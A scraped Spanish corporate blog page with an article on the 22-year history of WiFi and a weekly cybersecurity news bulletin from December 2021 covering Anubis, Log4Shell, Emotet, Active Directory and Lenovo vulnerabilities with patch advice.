oportunidades nunca antes conocido”, asegura Balcázar. Bricoarcade, la empresa española que fabrica nostalgia16 tendencias que tu pyme no puede pasar por alto en 2022
WiFi: dos décadas de historia y el futuro por delanteLeandro Pavón Serrano 20 diciembre, 2021 El pasado 30 de septiembre se celebraba el 22 aniversario del WiFi. Con más de dos décadas de historia, la conectividad basada en WiFi alcanza hitos constantemente como, por ejemplo, llegar a lugares tan sorprendentes como el campamento base del Everest o la Estación Espacial Internacional. Alberga dos terceras partes del tráfico de datos de Internet en España y probablemente supera los 500 millones de puntos de acceso en el mundo… La importancia del WiFi Pero, además de las cifras, WiFi destaca por otros motivos: Es una tecnología económica, que no requiere licencias ni permisos especiales para su uso. Gracias a ella se han podido abordar proyectos que no hubieran sido viables con otros sistemas.Proporciona una equilibrada combinación de cobertura, movilidad, velocidad y compatibilidad.En la actualidad cuenta con implantaciones en todos los sectores empresariales. Cada día surgen nuevos casos de uso y formas de mejorar el retorno de la inversión.Se considera una de las mejores herramientas para reducir la brecha digital. Prueba de ello es su relevancia en proyectos como Escuelas Conectadas de Red.es en España o el #WIFI4EU de la Unión Europea.También es popular en el hogar. Cada vez más elementos domésticos soportan WiFi: sistemas multimedia, videoconsolas, electrodomésticos, wearables, etc.Frecuentemente es la punta de lanza de una estrategia de transformación digital. Entre otras ventajas, elimina las barreras de la ubicuidad de las redes de acceso cableadas, proporciona un método de interacción con los usuarios y permite implementar soluciones avanzadas basadas en big data. Por ejemplo, en la localización de activos o navegación en interiores. Su complementariedad con las comunicaciones móviles Cuando se cumple el 22 aniversario el WiFi podemos decir que su futuro es esperanzador. Lejos de competir con tecnologías como las comunicaciones móviles, ambas se complementan. En WiFi se han incorporado funcionalidades que ya habían sido desarrolladas y probadas en telefonía móvil, como MiMo. Y las redes WiFi , por su parte, permiten descargar de tráfico a las redes de operador móvil, amplían la cobertura a rincones a los que no es posible llegar de otro modo o proporcionan mayores velocidades y mejores latencias. Uno de los mejores ejemplos de esta simbiosis entre sistemas de acceso inalámbrico sería WiFi Calling y, en ese sentido, se espera que OpenRoaming alcance igual o mayor éxito. Además, WiFi no se ha limitado a evolucionar en velocidad. Con WiFi6 se incluyen mejoras que ayudarán a reducir la batería de los dispositivos móviles cuando usan esta red. También admite una mayor concentración de usuarios. De la misma familia de tecnologías WiFi, existe WiGig, que emplea los 60 GHz para crear radioenlaces económicos de alta calidad. HaLow, por su parte, está orientado a proporcionar conectividad al creciente Internet de las Cosas (IoT). Un repaso a la historia con WiFi 7 en el horizonte Mientras se siguen evolucionando nuevas redes a WiFi 6 y esperamos a que en Europa se resuelva la regulación del WiFi 6E, el IEEE y resto de actores relevantes de la industria trabajan para tener listo WiFi 7 en 2024. Pero veamos cómo ha sido el recorrido hasta llegar al 22 aniversario del WiFi : A principios del siglo XX se comenzaron a desarrollar múltiples aplicaciones como la telegrafía inalámbrica y la radiodifusión. Estas aprovechaban las ondas electromagnéticas para enviar información a largas distancias sin necesidad de emplear cables. La figura de Hedy Lamarr En 1941 Hedy Lamarr y George Antheil inventan un sistema para el guiado a distancia de torpedos, que emplea una señal con saltos de frecuencia continuos para evitar que el control remoto fuera detectado y bloqueado. Este sistema sería el primer ejemplo práctico de transmisión de señales con modulación de espectro ensanchado.Diez años más tarde, la Universidad de Hawái creaba una red de datos sobre UHF para interconectar las islas. ALOHANET -así se conoce a esa red- emplea la modulación de banda estrecha FM pero destaca por permitir el acceso múltiple gestionando las colisiones que se producen cuando varios dispositivos intentan comunicar al mismo tiempo.La tecnología de Lamarr permaneció clasificada hasta 1985. Entonces la Comisión Federal de Comunicaciones (FCC) de Estados Unidos la hizo pública, coincidiendo con la liberación (no requiere licencia de uso) de las bandas en 900 MHz, 2,4 GHz y 5 GHz.En 1990 la compañía NCR sacaba al mercado la tecnología WaveLAN para crear redes inalámbricas locales. En ese momento empresas como IBM, Lucent o AT&T comercializan su uso e incluso aplican la tecnología a ordenadores portátiles.Siete años después la asociación de ingenieros IEEE libera el estándar 802.11. Este método de comunicación inalámbrica para rango de frecuencias del infrarrojo aplica las ventajas del espectro ensanchado y técnicas de gestión de colisiones.En 1999, ya a las puertas del siglo XXI, el IEEE libera los estándares 802.11a y 802.11b, que funcionan en las bandas de 5 y 2,4 GHz respectivamente. Se convierte en un auténtico éxito comercial y se populariza el término WiFi para referirse a esta tecnología. Desde ese momento, las redes WiFi comienzan un crecimiento imparable y un desarrollo constante. Si os ha parecido interesante, la figura de Hedy Lamarr por sí misma merece un artículo propio que quizá me anime a escribir más adelante. Precursora de sistemas como el WiFi y el GPS, además de actriz, en Austria, su país de origen, el Día del inventor se celebra el día de su nacimiento. En la actualidad es puesta de ejemplo en la lucha contra los encasillamientos y las limitaciones al desarrollo de las mujeres en el campo científico-técnico. Todo un referente. Imagen: duncan c Diez libros para regalar estas NavidadesEl metaverso, una oportunidad para la industria española
Boletín semanal de ciberseguridad 11 – 17 diciembreTelefónica Tech 17 diciembre, 2021 Nueva campaña de distribución del troyano bancario Anubis Investigadores de Lookout han informado sobre una campaña maliciosa en la que se distribuye una nueva versión del troyano bancario Anubis ofuscado en una aplicación móvil de Android que simula ser de la compañía francesa de telecomunicaciones Orange. Actores maliciosos habrían fijado como objetivos a un total de 394 aplicaciones financieras como bancos, billeteras de criptomonedas y plataformas de pago virtual con el objetivo de exfiltrar las credenciales de estos servicios. Anubis es un troyano bancario conocido desde el 2016 cuyo desarrollo no se ha detenido en ningún momento. Una vez instalado en el dispositivo de la víctima, su funcionamiento pasa por mostrar formularios de inicio de sesión fraudulentos de las aplicaciones que se fijan como objetivo para comprometer las credenciales del usuario, así como también cuenta con otras funciones como, grabación de pantalla y sonido, envío y lectura de SMS o escaneo del dispositivo en busca de archivos de interés para exfiltrar. Según la investigación, la distribución de la aplicación de Orange fraudulenta se estaría llevando a cabo a través de sitios web maliciosos, mensajes directos en redes sociales, smishing y publicaciones en foros. Más info: https://www.bleepingcomputer.com/news/security/anubis-android-malware-returns-to-target-394-financial-apps/ Vulnerabilidad Log4Shell El pasado viernes 10 de diciembre se dio a conocer una vulnerabilidad 0-day en Apache Log4j, catalogada como CVE-2021-44228. Se trata de una vulnerabilidad que afecta a la librería de registro Java Apache Log4j 2, utilizada por multíplices aplicaciones de empresas en todo el mundo, al tratarse de una librería de código abierto. La explotación de este fallo permitiría la ejecución de código malicioso en servidores o clientes de aplicaciones. El riesgo por tanto provenía de diferentes factores que se unieron: El día 9, el día anterior a la publicación de la versión corregida, ya había disponible un exploit para esta vulnerabilidad.Su explotación es sencilla.Log4j es utilizada a nivel mundial en muchas aplicaciones web. Esta vulnerabilidad se corregía inicialmente en Log4j 2.15.0. Sin embargo, unos días más tarde se conocía una segunda vulnerabilidad catalogada como CVE-2021-45046, derivada de una incompleta corrección de la vulnerabilidad Log4Shell y se lanzaba la versión Log4j 2.16.0 para corregir definitivamente el fallo. Inicialmente esta segunda vulnerabilidad se catalogaba como de denegación de servicio y se le otorgaba un CVSSv3 de 3.7 pero, en las últimas horas, se ha modificado su riesgo a 9 y su categoría a ejecución remota de código. Tras la publicación de esta vulnerabilidad, se ha ido conociendo la existencia de diversos intentos de explotación del fallo como el intento de infección con botnets para la instalación de mineros de criptomoneda, su uso para distribuir ransomware (Khonsari) o la distribución del troyano StealthLoader. Es destacable de hecho, que se han encontrado evidencias de su explotación previa al día 9 de diciembre, si bien, la explotación masiva habría dado lugar con la publicación del exploit. En cuanto a los productos afectados, el listado completo aún no está definido. A lo largo de la semana se han ido conociendo los productos para los que se detectaba afectación poco a poco, siendo el listado más completo el publicado por el Nationaal Cyber Security Centrum (NCSC-NL). Más información: https://logging.apache.org/log4j/2.x/security.html Emotet vuelve a utilizar Cobalt Strike Investigadores de seguridad avisaron en el día de ayer que, tras un breve parón en las operaciones de Emotet la semana pasada, los actores amenaza han comenzado, una vez más, a instalar beacons de Cobalt Strike en los dispositivos infectados con Emotet. Según ha informado el investigador de seguridad Joseph Roosen, del grupo Cryptolaemus especializado en esta amenaza, Emotet está descargando los módulos de Cobalt Strike directamente desde su servidor de Command & Control para posteriormente ejecutarlo en los dispositivos infectados. De esta forma, los atacantes obtienen acceso inmediato a las redes vulneradas. Para ello, los agentes amenaza utilizan un archivos jQuery maliciosos para comunicarse con el C2 y recibir nuevas instrucciones. A pesar de ser un archivo malicioso, la mayor parte del código es legítimo, haciendo más sencillo evadir los sistemas de seguridad de la víctima. Debido al incremento de beacons de Cobalt Strike distribuidos a equipos ya infectados, se prevé un incremento en los incidentes de seguridad sufridos por las compañías durante los próximos meses. Todos los detalles: https://www.bleepingcomputer.com/news/security/emotet-starts-dropping-cobalt-strike-again-for-faster-attacks/ Nuevos exploits para vulnerabilidades ya corregidas de Microsoft En las últimas horas se habría detectado la existencia de nuevos exploits para varias vulnerabilidades que se corregían en boletines previos de Microsoft: CVE-2021-42287 y CVE-2021-42278. El primero de los fallos, CVE-2021-42287 CVSSv3 de 8.8 es una vulnerabilidad de elevación de privilegios en los servicios de dominio de Active Directory, corregida por Microsoft en su boletín de seguridad del pasado mes de mayo. Este fallo según indica la propia Microsoft afecta al Certificado de Atributos de Privilegio (PAC) de Kerberos y permite a un atacante hacerse pasar por los controladores de dominio. Para explotarla, una cuenta de dominio comprometida podría hacer que el Centro de Distribución de Claves (KDC) creara un ticket de servicio (ST) con un nivel de privilegio superior al de la cuenta comprometida. Un atacante logra esto impidiendo que el KDC identifique a qué cuenta corresponde el ST de mayor privilegio. Si este fallo se encadena con otra vulnerabilidad corregida en el boletín de noviembre, la CVE-2021-42278 CVSSv3 de 8.8, permitiría a los atacantes alcanzar derechos de administrador de dominio en cualquier entorno de Active Directory. La cadena de explotación es extremadamente fácil de aprovechar, permitiendo a los adversarios elevar sus privilegios incluso sin acceso a la cuenta de usuario estándar subyacente. Hay una actualización disponible para todos los sistemas operativos compatibles. En cualquier caso la mitigación pasa por parchear los controladores de dominio afectados implementando el parche de Microsoft del 14/11/2021 (KB5008602) que soluciona el problema de la confusión del PAC, así como el problema de S4U2self creado por el parche anterior (KB5008380). No obstante, algunas fuentes mencionan que el parche KB5008602 sólo es efectivo en Windows Server 2019 por lo que es recomendable consultar la siguiente guía con el fin de mitigar el problema en otras versiones del producto. Actualmente no se conoce que haya explotación activa de estos fallos, pero sí que observamos que existe un post que explica cómo se podría explotar este problema, así como una herramienta en Github que escanea y explota estas vulnerabilidades. Adicionalmente, en redes sociales se empiezan a observar menciones sobre la posible combinación de estos fallos con la vulnerabilidad crítica Log4j. Más info: https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html Vulnerabilidades en dispositivos Lenovo Investigadores de seguridad de NCC Group han descubierto dos nuevas vulnerabilidades en el componente IMController presente en múltiples dispositivos Lenovo, incluidos portátiles Yoga y ThinkPad, y que estaría afectado a todas las versiones de Lenovo System Interface Foundation anteriores a 1.1.20.3. Lenovo System Interface Foundation es un sistema que se ejecuta con privilegios SYSTEM y que ayuda a los dispositivos Lenovo a comunicarse con aplicaciones universales, proporcionando al usuario funciones como la optimización del sistema y la actualización de controladores, entre otras. Si este se desactiva, las aplicaciones de Lenovo dejarían de funcionar correctamente. Las nuevas vulnerabilidades identificadas (CVE-2021-3922 / 3969 CVSSv3 7.1) podrían permitir que un usuario malintencionado pudiera ejecutar comandos con privilegios de administrador. La primera de ellas es una vulnerabilidad del tipo race condition que permitiría interactuar con el proceso secundario “Pipe” de IMController. El segundo sería un fallo del tipo TOCTOU (time-of-check to time-of-use) que, de ser aprovechado, podría permitir escalar privilegios en el dispositivo vulnerable. NCC Group avisaba a Lenovo de ambos fallos el pasado mes de octubre, emitiéndose finalmente actualizaciones el día 14 de diciembre que solventarían ambos errores, por lo que se recomienda actualizar IMController a la versión 1.1.20.3. Detalles aquí: https://research.nccgroup.com/2021/12/15/technical-advisory-lenovo-imcontroller-local-privilege-escalation-cve-2021-3922-cve-2021-3969/ Nuestra herramienta Aristeo en la Ekoparty 2021¿Qué contiene el “curso en ciberseguridad” que deben seguir los atacantes afiliados de Conti, el ransomware de éxito?